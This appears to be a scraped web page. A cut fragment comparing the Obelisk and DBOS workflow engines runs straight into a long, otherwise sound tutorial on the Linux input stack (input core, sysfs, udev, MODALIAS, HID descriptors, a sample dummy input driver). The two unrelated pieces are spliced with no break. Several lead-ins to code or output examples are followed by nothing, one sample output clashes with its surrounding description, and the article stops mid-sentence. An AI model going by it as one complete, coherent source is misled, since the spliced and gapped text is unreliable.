Obelisk: High scalability. Successfully handled 100k concurrent workflows (<500MB RSS) by unloading inactive workflows.

Infrastructure Dependencies
DBOS: Requires PostgreSQL.
Obelisk: Embeds SQLite.
DBOS is an interesting project that is very easy to start with, as it encourages developers to include it as a library
in their main application. This architectural decision shapes its features.
Since there is no isolation, determinism is managed by the developer's discipline.
This may make it harder to review changes, as seemingly unrelated code changes can lead to (silent) determinism breakage.
Its code change detection can be improved; however, it is simply impossible to prevent accidental nondeterministic constructs unless workflows are completely isolated in a runtime that is built around deterministic execution.
On the plus side, DBOS requires no configuration, as workflows, steps and HTTP endpoints are just code.
Obelisk's main strength is its WASM runtime:
No footguns (threads, IO, hash maps, etc.) in workflows
The WASM file contains the entire code, so associating executions with their original codebase is trivial (although not implemented yet).
Able to unload running executions from memory transparently.
Separation of components
Coordination through WIT schemas
Easy to deploy on lightweight VM
The Input Stack on Linux: An End-To-End Architecture Overview
Let’s explore and deobfuscate the input stack on Linux. Our aim is to
understand its components and what each does. Input handling can be
divided into two parts, separated by a common layer:
Kernel-level handling: It deals with what happens in the kernel and how events are exposed to user-space
The actual hardware connected to the machine, along with the different buses and I/O/transport subsystems
The input core subsystem, and the specific device drivers that register on it
Exposed layer (middle)
The event abstraction subsystem (evdev)
devtmpfs for device nodes
sysfs for kernel objects and device attributes
procfs for an introspection interface of the input core
User-space handling:
The user-space device manager (udev) and hardware database (hwdb) for device management and setup
The libinput library for general input, and other libraries such as
XKB for keyboards, to interpret the events and make them manageable
The Widgets, X Server, X11 window managers, and Wayland compositors,
which rely on everything else
We’ll try to make sense of all this, one thing at a time, with a logical
and coherent approach.
NB: This article compiles my understanding; for any corrections, please
contact me.
The Kernel’s Input Core
How are input devices and their events handled in the kernel? You might
think it is useless to know, but understanding some of the kernel logic
is what makes things click.
The input core is the central piece of the kernel responsible for handling
input devices and their events. Most input devices go through it, although
some bypass it entirely but these are special use-cases. It provides
common abstract components that sit between the low-level hardware,
and the more useful features for user-space, along with a sort of
publish-subscribe system.
To follow along, you can either download the kernel
source or view it in an online code browser (such as
this
,
this
,
or
this
).
Practically, the input core is found in the kernel under
drivers/input/input.c
; it defines the basic functionality related
to the lifecycle of an input device, defined as a
struct input_dev
(
input.h
). Namely:
Allocating the input device structure (
input_allocate_device
that
returns a
struct input_dev
)
Registering and unregistering the input device in the system
along with setting sane default values
(
input_register_device
adds to
input_dev_list
). This also integrates with devtmpfs,
exposing the device, and with procfs, exposing debugging information
(
/proc/bus/input/
).
Drivers push events to the input core using
input_event
. The core then
forwards the events to the registered handlers in
a fan-out fashion (
input_register_handler
adds an
input_handler
to
input_handler_list
). Then handlers forward
them to all clients in user-space (called
input_handle
) listening
for events on that handler. The clients are registered on
the handler with
input_register_handle
(similar confusing names).
The user-space client/handle can also grab the device with exclusivity
through
input_grab_device
(ex:
EVIOCGRAB
in evdev).
By default the evdev (event device) is attached as the default input
handler and exposes these events to user-space in a standardized way
via an evdev created character stream in devtmpfs (
/dev/input/eventX
).
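To see that character stream for yourself, here is a small hedged sketch in Rust (my own illustration, using only the standard library; the device path is an example, and reading it usually requires root or membership in the input group). On 64-bit Linux each record is 24 bytes: a struct timeval (two i64s), then a u16 type, a u16 code and an i32 value.

use std::fs::File;
use std::io::Read;

fn main() -> std::io::Result<()> {
    let mut dev = File::open("/dev/input/event3")?; // example device node
    let mut buf = [0u8; 24];                        // one input_event record
    loop {
        dev.read_exact(&mut buf)?;
        let ev_type = u16::from_ne_bytes([buf[16], buf[17]]);
        let code = u16::from_ne_bytes([buf[18], buf[19]]);
        let value = i32::from_ne_bytes([buf[20], buf[21], buf[22], buf[23]]);
        if ev_type == 1 {
            // EV_KEY: value 1 = press, 0 = release, 2 = autorepeat
            println!("EV_KEY code={code} value={value}");
        }
    }
}

Tools like evtest and libinput debug-events are friendlier front-ends for the same stream.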
An input handler is an implementation of an abstract interface
(
include/linux/input.h
), which the input core will call. Particularly,
the
input_event
function in input core will invoke the implementation
of the input handler’s
events
function. Here’s the interface an input
handler should fulfil:
Each actual specific input device driver builds on top of the functions of the
input core in their internal code, adding their own specificities and
advertising what capabilities and features the device can generate. This
creates a polymorphic-like abstraction where common input core logic is
reused, and where input event handlers are abstracted away. In general,
the main role of input drivers is to translate the device specific
protocol to a more standardized protocol, such as evdev, so that it can
be useful in user-space. Additionally, as with most drivers' means of communicating with the rest of the system, they can expose extra configuration through an ioctl interface.
Along with all this, the kernel has a mechanism called sysfs that is
used to expose its internal objects (kobject) to user-space. Anytime
a device is created, it is exposed in
/sys/
(usually mounted there)
with its properties (
/sys/devices/
). For the input core part, we can
find it in
/sys/class/input/inputN
, and within each sub-directories
we have the properties of the object.
Furthermore, when a device is plugged or unplugged (
device_add
,
device_remove
in
drivers/base/core.c
), the kernel also emits events,
called uevent, via netlink (
PF_NETLINK, NETLINK_KOBJECT_UEVENT
) which
can then be caught in user-space and acted upon. We’ll see later how
these are handled by udev.
This is a general overview of our understanding of the input core so far:
The Logical Input Device Topological Path
We may commonly say that devices are connected to a machine and magically
handled from there on. Yet, we know that it’s an abstraction and that
there’s more to it. What happens in reality is that the electrical
connection first passes over a bus/host controller, which then lets the
data be transported. This data is formatted in a specific input protocol
that should be handled by a driver that speaks it and that subsequently
creates a related input device. In most input device cases, the driver
then translates the protocol into evdev
“common speech”
.
That’s a whole layer of things before reaching the input core. Just like
in the world of networking, one thing wraps another. In this particular
case, devices have parents, a hierarchy, a stack of devices, drivers,
and helpers.
Here's what that stack looks like in theory, though in reality some of the lines are blurred together:
In this section, let’s try to understand how the kernel uses
plug’n’play/hotplug to pick the right drivers in this stack, and how we
pass from electrical signal to evdev. To do that we’ll first look at
how the kernel pictures its internal objects, and how these together
somehow create the above hierarchy. Finally, we’ll see some concrete
examples of that, along with some command line tools that can clearly
display this encapsulating behavior.
As we said there’s a hierarchy of kobjects in the kernel from the bus
to its connected devices. These are stored in-memory as a linked list
hierarchy, which is also represented under sysfs as a file system tree.
Specifically, in
drivers/base/core.c
this is what is used to create
the parent-child relationship:
/devices/...
— root of the kernel’s sysfs device tree, showing all devices known to the kernel.
pci0000:00/0000:00:14.0
— PCI bus and controller (the USB host controller here).
usb1/1-1/1-1:1.0
— USB bus and port hierarchy (device 1-1, interface 1.0).
0003:046D:C31C.0003
— HID device node (bus
0003
= USB HID, vendor
046D
= Logitech, product
C31C
= specific keyboard).
input/input6
— input subsystem device registered under
/sys/class/input/input6
.
event3
— the evdev interface, the character device exposed in
/dev/input/event3
.
How did we end up with this long list, how did it get created? Let’s see
how the kernel stores this info, and what happens from its perspective.
As far as it's concerned, the device-related things it knows about are summed
up in these types of objects:
bus - a device to which other devices can be attached
device - a physical/logical device that is attached to a bus
driver - a software entity that can be associated with a device and
performs operations with it
class - a type of device that has similar behavior; There is a class
for disks, partitions, serial ports, input, etc.
subsystem - a view on the structure of the system; Kernel subsystems
include devices (hierarchical view of all devices in the system), buses
(bus view of devices according to how they are attached to buses),
classes, input, etc. We care about the input subsystem.
For example, there are different views of the same device. You’ll find
the physical USB device under
/sys/bus/usb/devices/
and the logical
device of the input class under
/sys/class/input/.
Let’s go over these objects, tracing the path, starting with buses.
A hardware bus/host controller is a communication channel between the
processor and input/output devices. But a kernel bus object is more
generic than this: it's a logical function whose role is to be a point
of connection for devices. All devices are connected to a kernel bus,
even if it needs to be a virtual one. So kernel buses are the root of
the hierarchy.
The main buses are things such as PCI, USB, IDE, SCSI, platform,
ACPI, etc.
Kernel buses are the connective tissue of everything, the base of the
infrastructure. As you can see from the structure, a bus is responsible for
probing a device to get info about it, handling connected/disconnected
events, creating a new node for it, and sending a uevent to notify
user-space, triggering a chain reaction.
Yet, one of their most important roles is to start the match between
devices and registered device drivers, as can be noted from the
match
function. Keep in mind that the matched driver can be another bus, so
this initiates a cascade of different handlers, bubbling up the hierarchy.
A concrete example of this recursion:
A PCI bus controller (the host bridge) is a device on the platform bus.
The USB bus (usbcore) is a device on the PCI bus (via xHCI controller).
The HID bus is a device on the USB bus (via usbhid).
The specific HID protocol driver is a device on the HID bus
The low-level kernel buses such as the hardware buses/host controllers
generally don't handle input data directly, though there are some bus/host
controller drivers that do register input devices with the input core,
bypassing everything else in the stack and acting as event sources. These
exceptions are usually for brightness control hotkeys, lid sensors,
built-in special function keys, etc. We have, for example, the drivers
acpi_video
,
thinkpad_acpi
,
asus_wmi
, etc..
To know how to handle the devices and whether a driver needs to be loaded
from a module, all devices and buses have specially formatted IDs, to
tell us what kind of devices they are. The ID, which we call MODALIAS,
consists of vendor and product ID with some other subsystem-specific
values. Each bus and device has its own scheme for these IDs.
For a USB mouse, it looks something like this:
This is needed in case the driver isn't built into the kernel and instead
is an external module (
*.ko
). As a reminder, a driver is some piece
of code responsible for handling a type of device, and a module is a
piece of external kernel code that can be dynamically loaded at runtime
when needed. Depending on the distro choices, some drivers are set as
external modules that need to be loaded at runtime.
To achieve this, the kernel, after composing the MODALIAS string, sends
it within the uevent towards user-space. To complete this information,
each external kernel module comes with a list of known MODALIASes it can
handle, so that they can be loaded as needed. These lists are compiled
by programs such as
depmod
that create files like
modules.alias
in the kernel’s
/lib/modules
directory for all currently available
modules that aren’t built-in (
/lib/modules/VERSION
), and the built-in
ones (
modules.builtin
).
In theory that’s fine, this infrastructure model makes it easy to
dynamically load modules that are not already built-in, but we need
a piece of software in user-space to catch the events and perform the
actual loading. This is a role that udev embodies by calling
modprobe
for every event that has a MODALIAS key, regardless of whether a module
needs loading or not. We'll see more of udev, but for now keep in mind
that it's the one driving this hotplug mechanism.
If you're curious, you can try this udev command to monitor the MODALIAS values:
udevadm monitor --property
Yet, this doesn’t solve what happens to devices that were present at
boot and which need modules. The solution: there’s a file in the device
directory in sysfs for every device, appropriately named “uevent”. If you write
“add” to that file, the kernel resends the same event as the one lost
during boot. So a simple loop over all uevent files in
/sys
triggers
all events again.
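As a hedged sketch of that trick (not how udev actually implements coldplug, and it needs root): walk /sys/devices and write “add” to every uevent file so the kernel re-emits the events that were lost during boot.

use std::fs;
use std::path::Path;

fn retrigger(dir: &Path) -> std::io::Result<()> {
    for entry in fs::read_dir(dir)? {
        let path = entry?.path();
        // symlink_metadata() does not follow symlinks, so we only recurse
        // into real directories and avoid the symlink loops in sysfs.
        if path.symlink_metadata()?.is_dir() {
            let _ = retrigger(&path);
        } else if path.file_name() == Some(std::ffi::OsStr::new("uevent")) {
            let _ = fs::write(&path, "add"); // ask the kernel to resend the event
        }
    }
    Ok(())
}

fn main() -> std::io::Result<()> {
    retrigger(Path::new("/sys/devices"))
}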
The MODALIAS value is also stored in sysfs along with the device
properties, here are a few commands to gather information on this:
> cat /sys/devices/pci0000:00/0000:00:10.0/modalias
pci:v00001022d00007812sv00001025sd00000756bc0Csc03i30
> modprobe --resolve-alias $(cat /sys/devices/\
pci0000:00/0000:00:13.2/usb1/1-0:1.0/usb1-port3/modalias)
Not everything has an associated module
> ls -l /sys/devices/pci0000:00/0000:00:10.0/driver
lrwxrwxrwx 1 root root 0 Oct 25 11:37 driver \
-> ../../../bus/pci/drivers/xhci_hcd
If the driver link exists, check which module implements it:
> modprobe -R xhci_hcd
xhci_hcd
> modinfo xhci_hcd
name: xhci_hcd
filename: (builtin)
license: GPL
file: drivers/usb/host/xhci-hcd
author: Sarah Sharp
description: 'eXtensible' Host Controller (xHC) Driver
license: GPL
file: drivers/usb/host/xhci-hcd
description: xHCI sideband driver for secondary interrupter management
parm: link_quirk:Don't clear the chain bit on a link TRB (int)
parm: quirks:Bit flags for quirks to be enabled as default (ullong)
For example, the xhci_hcd module is built-in.
So far we’ve learned two things: buses which devices are connected to,
and the MODALIAS mechanism to match modules and dynamically load drivers
that aren’t built-in. Let’s see the devices attached to buses as they
appear as kernel objects.
struct device {
    // …
    struct device *parent;
    struct device_private *p;
    struct kobject kobj;
    const char *init_name;          /* initial name of the device */
    // …
    struct bus_type *bus;           /* type of bus device is on */
    struct device_driver *driver;   /* which driver has allocated this device */
    // …
    const struct class *class;
    // …
    void (*release)(struct device *dev);
};
Along with the related driver:
struct device_driver {
    const char *name;
    struct bus_type *bus;
    struct driver_private *p;
    struct module *owner;
    const char *mod_name;           /* used for built-in modules */
    int (*probe)(struct device *dev);
    int (*remove)(struct device *dev);
    void (*shutdown)(struct device *dev);
    int (*suspend)(struct device *dev, pm_message_t state);
    int (*resume)(struct device *dev);
};
As you can notice, they also have probing and lifecycle functions to
be implemented. We also have the registration/unregistration functions
(
input_register_device
and
input_unregister_device
in our case)
which will announce that the device is now available in the system (plus
a uevent and other user-space stuff). Each of the registered devices
have an entry in sysfs
/sys/devices
, along with the information about
its driver, and similar info in
/sys/class
and
/sys/bus
. The
device also creates files in devtmpfs that represent its interfaces. Let’s
note that devtmpfs is usually mounted by default to user-space as a virtual
filesystem on most distros.
To check whether devtmpfs is enabled, which is almost always the case today:
> zcat /proc/config.gz | grep DEVTMPFS
CONFIG_DEVTMPFS=y
CONFIG_DEVTMPFS_MOUNT=y
CONFIG_DEVTMPFS_SAFE=y
> mount | grep devtmpfs
dev on /dev type devtmpfs (rw,nosuid,relatime,size=2720672k,\
nr_inodes=680168,mode=755,inode64)
> mount | grep sysfs
sys on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
Devices are associated to classes and subsystems that handle them.
The subsystem we care about here is what we’ve seen in the earlier
section: the input core, the input device subsystem.
subsys_initcall(input_init);
As for the concept of a class, it’s a high-level view of the device
model, abstracting implementation details. For example there are drivers
for SCSI and ATA but both are in the disks class. Similarly, all input
devices are in the input class, which is what we care about. This is
a grouping mechanism, unrelated to how the devices are connected. They
can be found in sysfs
/sys/class/
.
The
struct class
is instantiated in the
struct device
through
class_register
and
class_unregister
. This will in turn also help
udev, as we’ll see later, better manage the devices in devtmpfs user-space
mapping
/dev/
, adding a filter for rules.
This completes our overview of the way the kernel perceives the different
types of objects it manages. However, that didn’t clarify how we ended
up with the example path above other than somehow having a kernel bus and
device hierarchy.
We talked about hardware bus and host controller drivers that don't handle
the data themselves and delegate this to an upper layer. In theory
this upper layer is split between a kernel bus&device for the transport
layer, aka IO layer, and a kernel bus&device for the protocol layer,
but in reality those might get mixed up (bus&device because it’s both).
The IO layer is responsible for handling the physical electrical
communication with the device, its setup, and its management. At this level
we have USB, Bluetooth, I2C, SPI, etc.. In drivers that means:
usbhid
for HID devices over USB,
btusb
and
hidp
for HID over Bluetooth,
i2c-hid
for touchpads and keyboards that are wired to the motherboard’s
I2C,
psmouse
and
serio
for PS/2 mice, etc.
The protocol or function specific layer then takes over and has as role
to integrate with the input core and translate the raw transport data
into a common format, usually evdev. The evdev format is favored
as it provides a uniform API to represent input devices (via
/dev/input/eventX
).
A few examples:
There's a mouse communication protocol using a 9-pin DE-9 connector over the RS-232
standard, communicating via UART
The PS/2 mouse which uses a serial transport protocol with 6 pins (
serio
)
The atkbd keyboard also over serial transport
A gamepad that uses HID, such as the particular case of a Sony joystick over USB
There’s another component of complexity to add: we don’t have a
single protocol for a single transport over a single hardware bus/host
controller. Sometimes there’s a generic protocol layer which is reused
with different transport mechanisms. There can also be a delegation
mechanism for the more specific sub-protocol handlers for specific
devices or modes.
For example, you can have an HID protocol over USB (
usbhid
), and the
particular part of the HID protocol used for input devices, and the more
specific sub-HID protocol of a type of device (
hid-generic
and others).
We’ll see an example of this by diving into the HID subsystem which is
the most popular input protocol these days, but first let’s check some
tools that can help us see all that we’ve learned thus far and make
sense of the hierarchy:
lspci -vn
list info about devices connected via PCI buses
lsusb -v
or
usb-devices
list usb devices information in a more human readable form
dmesg
the kernel/system logs
hwinfo --short
to probe hardware
Yet the best way to get a lot of info about the bus and device hierarchy
is to rely on
udevadm
, a user-space tool that comes with udev. Here’s
how it looks for an input device:
> udevadm info -a -p $(udevadm info -q path -n /dev/input/event9)
looking at device '/devices/.../input/input6/event9':
  KERNEL=="event9"
  SUBSYSTEM=="input"
  ATTR{name}=="Logitech USB Keyboard"
  ...
looking at parent device '/devices/.../input/input6':
  KERNEL=="input6"
  SUBSYSTEM=="input"
  ...
looking at parent device '/devices/.../0003:046D:C31C.0003':
  KERNELS=="0003:046D:C31C.0003"
  DRIVERS=="hid-generic"
  SUBSYSTEMS=="hid"
  ...
looking at parent device '/devices/.../1-1:1.0':
  KERNELS=="1-1:1.0"
  SUBSYSTEMS=="usb"
  DRIVERS=="usbhid"
  ...
looking at parent device '/devices/.../1-1':
  KERNELS=="1-1"
  SUBSYSTEMS=="usb"
  DRIVERS=="usb"
  ...
looking at parent device '/devices/.../0000:00:14.0':
  KERNELS=="0000:00:14.0"
  SUBSYSTEMS=="pci"
  DRIVERS=="ohci-pci"
  ...
NB
: It is also a bit clearer, though perhaps confusing at this point,
to also look at
udevadm info --tree
. Similarly, the
loginctl
seat-status
also clearly shows the hierarchy of devices in the current
session. We’ll talk more about the concept of seats later on.
We see the “looking at parent device” block that corresponds to one
struct device
in the kernel kobject mapped in sysfs, along with the
driver, when it’s present, and other info it gathers at every step,
walking down the bus hierarchy. Let’s note that not everything has
an associated driver since the hardware topology might not match the
driver topology. That often means one kernel component handles multiple
parts of the stack. In the above trace,
hid-generic
handles the input
registering.
This example in particular shows:
PCI → USB controller → USB device → HID interface → input device → evdev node
Another source of information that we briefly mentioned is the procfs
introspection interface (
/proc/bus/input/
), it can also help see the
handling of input devices more clearly as it’s a text-based view of what
the kernel input subsystem knows. It is more or less analogous to the
sysfs view but is meant for human-readable diagnostics. In conjunction
with what we’ve learned in the previous input core section, it should
clarify some of our understanding. It has two files underneath:
devices
and
handlers
.
The
devices
file contain all the current input devices and has entries
with these fields:
I
: basic info (bus type, vendor/product/version)
N
: name
P
: physical path (e.g.,
isa0060/serio0/input0
)
S
: sysfs path
U
: unique identifier (if provided)
H
: list of event handler interfaces bound (like
event3
,
js0
, etc.)
B
: capability bitmaps (
EV
,
KEY
,
REL
,
ABS
, etc.); we'll explore what
these mean when looking at evdev
Here you can see that a single physical device can possibly present
itself as multiple input devices with different handlers attached for
separate functions (here the keys of the System Control handler are
fewer). Here,
kbd
is the console handler, and
eventN
is the evdev
user-space handler. Libinput, which we’ll cover later, uses groups
LIBINPUT_DEVICE_GROUP
to logically combine the different devices that
are actually on the same hardware.
The handlers file is about instances of the
input_handler
that will
be called from input core’s
input_event
we mentioned before. As we
said, most of it is handled by evdev, but there are exceptions such as joydev and mousedev.
We'll talk about joydev later on. As for mousedev, it is there only for
legacy compatibility with the old
/dev/psaux
-style mouse interface.
Let’s now see the example of a dummy input driver, to get the idea across.
// SPDX-License-Identifier: GPL-2.0
#include <linux/module.h>
#include <linux/init.h>
#include <linux/input.h>
#include <linux/timer.h>

static struct input_dev *dummy_input_dev;
static struct timer_list dummy_timer;

static void dummy_timer_func(struct timer_list *t)
{
    static bool key_down = false;

    /* Simulate key press/release of KEY_A */
    key_down = !key_down;
    input_event(dummy_input_dev, EV_KEY, KEY_A, key_down);
    input_event(dummy_input_dev, EV_SYN, SYN_REPORT, 0);

    /* Reschedule timer */
    mod_timer(&dummy_timer, jiffies + msecs_to_jiffies(2000));
}

static int __init dummy_input_init(void)
{
    int err;

    dummy_input_dev = input_allocate_device();
    if (!dummy_input_dev)
        return -ENOMEM;

    dummy_input_dev->name = "Dummy Input Device";
    dummy_input_dev->phys = "dummy/input0";
    dummy_input_dev->id.bustype = BUS_VIRTUAL;
    dummy_input_dev->id.vendor = 0x0001;
    dummy_input_dev->id.product = 0x0001;
    dummy_input_dev->id.version = 0x0100;

    /* Declare we can emit key events */
    __set_bit(EV_KEY, dummy_input_dev->evbit);
    __set_bit(KEY_A, dummy_input_dev->keybit);

    err = input_register_device(dummy_input_dev);
    if (err) {
        input_free_device(dummy_input_dev);
        return err;
    }

    /* Setup a timer to inject key events periodically */
    timer_setup(&dummy_timer, dummy_timer_func, 0);
    mod_timer(&dummy_timer, jiffies + msecs_to_jiffies(2000));

    pr_info("dummy_input: registered fake input device\n");
    return 0;
}

static void __exit dummy_input_exit(void)
{
    del_timer_sync(&dummy_timer);
    input_unregister_device(dummy_input_dev);
    pr_info("dummy_input: unregistered\n");
}

module_init(dummy_input_init);
module_exit(dummy_input_exit);

MODULE_AUTHOR("Example Author");
MODULE_DESCRIPTION("Minimal Dummy Input Device");
MODULE_LICENSE("GPL");
That’s it, you should now have a rough idea of how we pass from
hardware events, to kernel objects, and end up within the input core
subsystem, which prepares events for user-space. Let’s now dig in
and explore a few of the topics we’ve only grazed in the past two sections.
sysfs
We already covered a lot of ground in understanding sysfs, so let’s
continue and summarize everything we know and complete the full picture.
As we briefly said before, sysfs is a virtual file system representation in
user-space of the kernel objects and their attributes: it’s how the kernel
exposes its current view of the system, and also how the user can interface
with the parameters of the kernel in a centralized manner. It’s all done
in a very Unixy way by manipulating simple files.
The file mapping happens as such: kernel objects are directories, their
attributes are regular files, and the relationship between objects is
represented as sub-directories and symbolic links.
The object information is categorized as one of the following. Each of
these is a sub-directory under
/sys/
.
block - all block devices available in the system (disks, partitions)
bus - types of bus to which physical devices are connected (pci, ide, usb)
class - driver classes available in the system (net, sound, usb)
devices - the hierarchical structure of devices connected to the system
dev - major and minor device identifiers. They can be used to automatically
create entries in the
/dev
directory. It’s another categorization of
the devices directory
firmware - information from system firmware (ACPI)
fs - information about mounted file systems
kernel - kernel status information (logged-in users, hotplug)
module - the list of modules currently loaded
power - information related to the power management subsystem
Within each of these entries, the information is found in standard files that each contain an attribute, plus optional symbolic links:
device (optional) - a symbolic link to the directory containing the device; it can be used to discover the hardware device that provides a particular service (for example, the PCI card behind eth0)
driver (optional) - a symbolic link to the driver directory (located in
/sys/bus/*/drivers
)
As far as we’re concerned, when it comes to input devices, the
/sys/devices/
directory is probably one of the most important. It’s
the representation of the hierarchy of devices we’ve talked about in
the previous section.
Pasting the tree here would be cumbersome, but try
tree -L 5 | less
within
/sys/devices
and you’ll clearly see how things fit together,
a direct hierarchical mapping of how devices are connected to each other.
Within this directory we can find interesting information associated with
the device and its type. For USB devices, for example, we have info such
as the bus number, port number, the vendor and product id, manufacturer,
speed, and others.
Furthermore, the
/sys/bus
directory organizes devices by the type of
bus they are connected to. You can imagine that this isn’t a linear
view since buses can have buses as devices (
usb
and
hid
each have
their directory even though
hid
is probably under
usb
), but it is
a helpful shortcut for seeing what is happening. Within each
bus directory there are two subdirectories: drivers, which contains the
drivers registered for the bus, and devices, which contains symbolic links
to the devices connected to that bus in
/sys/devices
.
Similarly, the
/sys/class
directory has another view of the system
from a more functional/type perspective. It’s about what devices do and
not how they’re connected. As far as we’re concerned, the subdirectory
/sys/class/input/
is where we’ll find symbolic links to all devices
that have the input class in
/sys/devices
.
This directory contains symlinks to both input devices and evdev devices,
the latter usually being sub-directories of the former. A notable file in
the input directory is the “capabilities” file, which lists everything
that the device is capable of, as far as input is concerned. We’ll revisit
this in the evdev section.
Finally, the last directory that is of interest to us in sysfs is
/sys/module/
which provides information and settings for all loaded
kernel modules (the ones that show with
lsmod
), their dependencies
and parameters.
Lastly, and it might not need to be mentioned, but sysfs needs to be
enabled in the kernel configuration. It always is these days, since
much software expects it.
HID — Human Interface Device
HID, or Human Interface Device, has been mentioned and sprinkled all
over the place in the last sections; we said it’s a device protocol, but
what is it exactly?
HID is probably the most important standard input/output device protocol
these days; it’s literally everywhere, and most new devices, from mice
to microphones, speak it over all types of transports such as USB, i2c,
Bluetooth, BLE, etc. It’s popular because it’s a universal way to let the
device first describe its capabilities (buttons, keys, axes, etc.) and
what it can send/receive (the Report Descriptor), and then send/receive them in
the expected way (Input/Output/Feature Reports).
In sum, in the ideal case it means avoiding a specific driver
for every new device out there and instead having a centralized, generic way
to handle all categories of devices, all working out-of-the-box. Indeed, in
practice it has worked great, and there have only been minor vendor or
hardware quirk fixes (
drivers/hid/hid-quirks.c
and others).
For example, a HID Report Descriptor may specify that “in a report
with ID 3, bits 8 to 15 are the delta x coordinate of a mouse”.
The HID report itself then merely carries the actual data values without
any extra meta information.
The current list of HID devices can be found under the HID
bus in sysfs,
/sys/bus/hid/devices/
. For each device, say
/sys/bus/hid/devices/0003:1B3F:2008.003E/
, one can read the
corresponding report descriptor:
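For instance, something along these lines (the blob is binary, so pipe it through a hex dump or a decoder from hid-tools):
> xxd /sys/bus/hid/devices/0003:1B3F:2008.003E/report_descriptor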
The raw HID reports can also be read from the
hidraw
file created by
hid core in devtmpfs
/dev/hidrawN
.
What does an input device HID Report and Report Descriptor look like?
We won’t go into too much detail since the HID specifications are huge;
we’ll only do a quick tour to get an idea and be productive with what
we know. If you want to dive deeper, check the specifications
here
, it’s divided into a basic structure doc
“HID USB Device Class Definition”, and the HUT, “HID Usage Tables”, which
defines constants to be used by applications.
So as we said, the main logic of the protocol is that HID messages are
called Reports and that to parse them we need a Report Descriptor. The
Report Descriptor is a kind of hashmap-like stream: it contains Items, which
are a 1-byte header followed by an optional payload of up to 4 bytes. The Items
don’t make sense by themselves, but do as a whole
when read as a full stream, since each Item has a different meaning. Some
meanings apply locally and others globally.
The encapsulating and/or categorizing Items are the Usage Page, which
is a generic category of thing we’re describing, with its subset of
Usage, which is the specific thing we control within that Page. These
are defined in the “HID Usage Tables” doc. It’s things such as the
Generic Desktop page (with Usages like X, Y, or Wheel), the Button page,
or the Keyboard/Keypad page.
This couple of info tells us how to better handle the HID internal data:
it says what is actually being handled.
Another grouping mechanism is the Collection, a broader category
to put together all that the device handles. Let’s say a mouse can
have buttons, a scroll wheel, and the axes it moves on, all within
a Collection. There are 3 types of collections that encapsulate each
other: Application (mandatory), the device-level group; Logical (optional),
a sub-grouping for related controls; and Physical (optional), a sub-grouping
for physical sensors.
Reports within Collections can also be grouped by IDs to facilitate
parsing.
Within all these, within the inner Collections, we finally have the
definition of what the Reports will actually look like. Here’s a subset
of what a Report Descriptor can look like:
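Here is a hedged reconstruction of such a fragment, in the human-readable form that decoding tools print (a 5-button mouse with relative X/Y; values illustrative):
Report ID (1)
Usage Page (Button)
Usage Minimum (1)
Usage Maximum (5)
Logical Minimum (0)
Logical Maximum (1)
Report Size (1)
Report Count (5)
Input (Data,Var,Abs)
Report Size (3)
Report Count (1)
Input (Cnst,Arr,Abs)
Usage Page (Generic Desktop)
Usage (X)
Usage (Y)
Logical Minimum (-127)
Logical Maximum (127)
Report Size (8)
Report Count (2)
Input (Data,Var,Rel)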
This is all a single report with ID
0x01
, and we see first that within
the Button page we have values ranging from 1 to 5, a count of fields
in the current report size of 5, for 5 buttons each having one bit. The
Input
Item tells us to start processing the Report as input data (there’s
also
Output
and
Feature
). It also indicates that buttons have absolute
values, unlike the X/Y axis which are relative.
The
Cnst
flag on the following data in the stream stands for constant,
and it’s basically ignored: it’s padding.
And so on; afterward we parse the rest of the data, the X/Y relative movements.
One thing to note is the scope of the meaning of the Items. Some apply
globally, such as the Usage Page, Logical Min/Max, Report Size, Report
Count, etc. Meanwhile, Usage only applies locally and needs to be set
again. Other Items have special meanings, such as Input, Output, Feature,
Collection and End Collection, and are about defining the structure of
data and when to process it.
Here’s a full real example with the Collection grouping mechanism:
As you can see, lots of it may seem redundant within the Logical and
Physical optional sub-collections but they’re often there by default
for hierarchical grouping. They’re not mandatory but common.
Let’s also note that from hid-input’s perspective, one device is created
per top-level Application Collection, so in theory a device can have
many sub-devices.
From the kernel’s perspective, the transport bus notices that a device
is advertised as an HID-class device, and then the data gets routed to the
HID core bus.
For example, this is what the USB transport might notice:
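A hedged illustration, as seen in the interface descriptor printed by lsusb -v for a USB keyboard (trimmed; values illustrative). The interface advertises the HID class (bInterfaceClass 3), so the usbhid transport claims it and hands the reports over to HID core:
Interface Descriptor:
  bInterfaceClass         3 Human Interface Device
  bInterfaceSubClass      1 Boot Interface Subclass
  bInterfaceProtocol      1 Keyboard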
The HID core subsystem is in charge of managing the lifecycle
(connect/disconnect/open/close) and of parsing the HID report descriptors
to understand the device capabilities. Once parsed, it dispatches
Reports to the HID drivers registered on the HID bus; each driver can
inspect the Usage Page and Usage to decide how and whether to handle
them. This is like a publish-subscribe mechanism. The most specific
registered driver (vendor specific) will match and handle Reports in
whatever way it sees fit, otherwise the hid-generic driver is the
fallback.
Several
*_connect
hooks in the HID core subsystem allow attaching
handlers for the different behaviors that HID devices provide. The most
important for us is
hidinput_connect
for
HID_CONNECT_HIDINPUT
,
to handle HID input devices. Its default implementation lives in
hid-input
(internally
hidinput_report_event
). Device-specific drivers
can override this behavior if needed. hid-input’s role is to bridge
with the input core, allocating and registering the input device via
input_register_device
, which will in turn expose
/dev/input/eventN
,
as we’ve seen before, and translate HID Reports to evdev.
Similarly, in this pub-sub fan-out fashion, another handler is the
default one registered for
HID_CONNECT_HIDRAW
, from
hidraw.c
(
hidraw_report_event
). This driver will create a raw interface on
devtmpfs (
/dev/hidrawN
) to interface with raw HID events that aren’t
necessarily input-related.
This looks somewhat like this:
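Roughly sketched, with many details elided:
transport (usbhid, i2c-hid, hidp) → HID core (parses the Report Descriptor)
    → matching HID driver (vendor-specific or hid-generic)
        → hid-input → input core → evdev → /dev/input/eventN
    → hidraw → /dev/hidrawN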
This is all neat; let’s list a couple of tools that can help us debug
HID and inspect HID Report Descriptors and Reports.
usbhid-dump
- will dump USB HID device report descriptors and streams
hidrdd
- verbose description of hid report descriptors
hid-tools
- has many sub-tools such as replay, decode, and recording
The simplest one in my opinion is hid-tools. Here’s an example of a
keyboard with consumer control and system control, the same one we’ve
seen in the procfs introspection interface earlier (
/proc/bus/input/
):
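The full recording is long, but the relevant shape is roughly this (heavily trimmed and paraphrased):
Usage Page (Consumer Devices)
Usage (Consumer Control)
Collection (Application)
    … volume, media and other consumer usages …
End Collection
Usage Page (Generic Desktop)
Usage (System Control)
Collection (Application)
    … sleep, power and other system usages …
End Collection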
You can see it has two Application Collections, so that’s why we had
two entries for the keyboard.
In some cases, the HID Report Descriptor is wrong
and needs some patching, which can either be done in a
